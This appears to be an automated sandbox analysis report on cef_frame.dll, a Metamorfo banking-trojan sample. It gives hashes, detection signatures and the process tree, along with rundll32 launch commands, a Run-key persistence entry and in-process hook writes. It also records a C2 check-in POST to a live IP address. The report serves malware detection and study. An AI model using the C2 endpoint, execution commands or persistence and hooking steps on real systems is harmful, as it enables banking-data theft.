Windows Analysis Report
cef_frame.dll

Overview

General Information

Sample name: cef_frame.dll
Analysis ID: 1592146
MD5: a03c075ec2d02a406712ecbc828ca98e
SHA1: 8f2b6a37800de2bc944e3d687bfd73754e550681
SHA256: 32530abfeaeaefebdf0715fd098104671d716bb02d609197bef67c7f4b8b0e8d
Tags: banker, dll, latam, trojan, user-johnk3r

Detection

Metamorfo
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Metamorfo
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Machine Learning detection for sample
Overwrites code with function prologues
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6428 cmdline: loaddll32.exe "C:\Users\user\Desktop\cef_frame.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3768 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 1912 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 504 cmdline: rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 1804 cmdline: rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TbsAppInstance MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5004 cmdline: rundll32.exe C:\Users\user\Desktop\cef_frame.dll,__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4232 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 5192 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TbsAppInstance MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 5632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1272 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1436 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 2168 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7064 cmdline: rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",dbkFCallWrapperAddr MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 6808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 5264 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 352 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
Name: Metamorfo
Description: According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo
No configs have been found
Source: dump.pcap | Rule: JoeSecurity_Metamorfo | Description: Yara detected Metamorfo | Author: Joe Security

    System Summary

    Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\SysWOW64\rundll32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32.exe
    Timestamp: 2025-01-15T20:38:03.630224+0100 | SID: 2833187 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.6 | Source Port: 49852 | Destination IP: 15.228.77.178 | Destination Port: 80 | Protocol: TCP

    AV Detection

    Source: cef_frame.dll | Virustotal: Detection: 29%
    Source: cef_frame.dll | ReversingLabs: Detection: 34%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
    Source: cef_frame.dll | Joe Sandbox ML: detected
    Source: cef_frame.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI

    Networking

    Source: Network traffic | Suricata IDS: 2833187 - Severity 1 - ETPRO MALWARE Win32/Metamorfo CnC Checkin : 192.168.2.6:49852 -> 15.228.77.178:80
    Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 15.228.77.178 80
    Source: global traffic | TCP traffic: 192.168.2.6:58179 -> 162.159.36.2:53
    Source: Joe Sandbox View | IP Address: 15.228.77.178
    Source: Joe Sandbox View | ASN Name: AMAZON-02US
    Source: unknown | DNS traffic detected: query: 171.39.242.20.in-addr.arpa replaycode: Name error (3)
    Source: global traffic | HTTP traffic detected: POST /ytr/serv.php HTTP/1.0 | Connection: keep-alive | Content-Type: application/x-www-form-urlencoded | Content-Length: 145 | Host: 15.228.77.178 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Source: unknown | TCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
    Source: unknown | HTTP traffic detected: POST /ytr/serv.php HTTP/1.0 | Connection: keep-alive | Content-Type: application/x-www-form-urlencoded | Content-Length: 145 | Host: 15.228.77.178 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Source: Amcache.hve.11.dr | String found in binary or memory: http://upx.sf.net
    Source: rundll32.exe, 00000003.00000002.2431194998.0000000004B51000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.2563309483.000000000851F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2571642187.00000000045F1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2577672561.0000000007E8F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2462605650.000000000844F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2973058518.0000000007F3F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2961091409.00000000045F1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2906768585.000000000851F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2898272562.0000000004BD1000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000003.2817042023.000000000825F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2865149640.00000000082CF000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2825340181.0000000004A51000.00000020.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.indyproject.org/

    System Summary

    Source: cef_frame.dll | Static PE information: section name: .E{7
    Source: cef_frame.dll | Static PE information: section name: .< a
    Source: cef_frame.dll | Static PE information: section name: .z}'
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 768
    Source: cef_frame.dll | Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: cef_frame.dll | Static PE information: Number of sections : 13 > 10
    Source: cef_frame.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
    Source: classification engine | Classification label: mal100.troj.evad.winDLL@28/29@1/1
    Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\632922
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5192
    Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\45585454uhuhuhuhuhuhuhuhu
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess504
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1912
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4232
    Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b3fdb59a-f5f4-4629-b8b8-3515d63ae95a
    Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept
    Source: cef_frame.dll | Virustotal: Detection: 29%
    Source: cef_frame.dll | ReversingLabs: Detection: 34%
    Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\cef_frame.dll"
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TbsAppInstance
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,__dbk_fcall_wrapper
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 768
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 776
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TMethodImplementationIntercept
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TbsAppInstance
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",__dbk_fcall_wrapper
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",dbkFCallWrapperAddr
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 768
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1272
    Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1436
    Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
    Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 768
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TMethodImplementationIntercept
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,TbsAppInstance
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\cef_frame.dll,__dbk_fcall_wrapper
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TMethodImplementationIntercept
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",TbsAppInstance
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",__dbk_fcall_wrapper
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",dbkFCallWrapperAddr
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cef_frame.dll",#1
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: version.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: netapi32.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: wsock32.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: magnification.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: wtsapi32.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: d3d9.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: dwmapi.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: security.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\loaddll32.exe | Section loaded: olepro32.dll
    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: cef_frame.dll | Static PE information: Virtual size of .text is bigger than: 0x100000
    Source: cef_frame.dll | Static file information: File size 22631424 > 1048576
    Source: cef_frame.dll | Static PE information: Raw size of .z}' is bigger than: 0x100000 < 0x1594200
    Source: initial sample | Static PE information: section where entry point is pointing to: .z}'
    Source: cef_frame.dll | Static PE information: section name: .didata
    Source: cef_frame.dll | Static PE information: section name: .E{7
    Source: cef_frame.dll | Static PE information: section name: .< a
    Source: cef_frame.dll | Static PE information: section name: .z}'

    Boot Survival

    Source: C:\Windows\SysWOW64\rundll32.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run rundll32.exe

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 7734BA30 value: 8B FF 55 8B EC
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 76934D90 value: 8B FF 55 8B EC
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 7694EBF0 value: 8B FF 55 8B EC
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 75928A90 value: 8B FF 55 8B EC
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 75950230 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 7734BA30 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 76934D90 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 7694EBF0 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 75928A90 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 75950230 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2168 base: 7734BA30 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2168 base: 76934D90 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2168 base: 7694EBF0 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2168 base: 75928A90 value: 8B FF 55 8B EC
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2168 base: 75950230 value: 8B FF 55 8B EC
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: B30005 value: E9 8B 2F 85 76
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 77382F90 value: E9 7A D0 7A 89
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: B40005 value: E9 2B BA 80 76
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 7734BA30 value: E9 DA 45 7F 89
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: B50008 value: E9 8B 8E 84 76
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 77398E90 value: E9 80 71 7B 89
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: D80005 value: E9 8B 4D BB 75
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 76934D90 value: E9 7A B2 44 8A
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: D90005 value: E9 EB EB BB 75
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 7694EBF0 value: E9 1A 14 44 8A
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: DA0005 value: E9 8B 8A B8 74
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 75928A90 value: E9 7A 75 47 8B
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: DB0005 value: E9 2B 02 BA 74
    Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6428 base: 75950230 value: E9 DA FD 45 8B
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 3380005 value: E9 8B 2F 00 74
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 77382F90 value: E9 7A D0 FF 8B
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 3390005 value: E9 2B BA FB 73
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 7734BA30 value: E9 DA 45 04 8C
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 8320008 value: E9 8B 8E 07 6F
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 77398E90 value: E9 80 71 F8 90
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 8340005 value: E9 8B 4D 5F 6E
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 76934D90 value: E9 7A B2 A0 91
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 8350005 value: E9 EB EB 5F 6E
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 7694EBF0 value: E9 1A 14 A0 91
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 8360005 value: E9 8B 8A 5C 6D
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 75928A90 value: E9 7A 75 A3 92
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 8370005 value: E9 2B 02 5E 6D
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 504 base: 75950230 value: E9 DA FD A1 92
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: A90005 value: E9 8B 2F 8F 76
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: 77382F90 value: E9 7A D0 70 89
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: AA0005 value: E9 2B BA 8A 76
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: 7734BA30 value: E9 DA 45 75 89
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: AB0008 value: E9 8B 8E 8E 76
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: 77398E90 value: E9 80 71 71 89
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: BD0005 value: E9 8B 4D D6 75
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: 76934D90 value: E9 7A B2 29 8A
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: BE0005 value: E9 EB EB D6 75
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: 7694EBF0 value: E9 1A 14 29 8A
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: BF0005 value: E9 8B 8A D3 74
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: 75928A90 value: E9 7A 75 2C 8B
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: C00005 value: E9 2B 02 D5 74
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1912 base: 75950230 value: E9 DA FD 2A 8B
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 3020005 value: E9 8B 2F 36 74
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 77382F90 value: E9 7A D0 C9 8B
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 3170005 value: E9 2B BA 1D 74
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 7734BA30 value: E9 DA 45 E2 8B
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 8150008 value: E9 8B 8E 24 6F
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 77398E90 value: E9 80 71 DB 90
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 8180005 value: E9 8B 4D 7B 6E
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 76934D90 value: E9 7A B2 84 91
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 8190005 value: E9 EB EB 7B 6E
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 7694EBF0 value: E9 1A 14 84 91
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 81A0005 value: E9 8B 8A 78 6D
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 75928A90 value: E9 7A 75 87 92
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 81B0005 value: E9 2B 02 7A 6D
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 1804 base: 75950230 value: E9 DA FD 85 92
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 81A0005 value: E9 8B 2F 1E 6F
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 77382F90 value: E9 7A D0 E1 90
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 81B0005 value: E9 2B BA 19 6F
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 7734BA30 value: E9 DA 45 E6 90
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 81C0008 value: E9 8B 8E 1D 6F
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 77398E90 value: E9 80 71 E2 90
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 82F0005 value: E9 8B 4D 64 6E
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 76934D90 value: E9 7A B2 9B 91
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 8300005 value: E9 EB EB 64 6E
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 7694EBF0 value: E9 1A 14 9B 91
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 8310005 value: E9 8B 8A 61 6D
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 75928A90 value: E9 7A 75 9E 92
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 8320005 value: E9 2B 02 63 6D
    Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5004 base: 75950230 value: E9 DA FD 9C 92
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: BC0005 value: E9 8B 2F 7C 76 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 77382F90 value: E9 7A D0 83 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: BD0005 value: E9 2B BA 77 76 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: 7734BA30 value: E9 DA 45 88 89 Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4232 base: BE0008 value: E9 8B 8E 7B 76 Jump to behavior
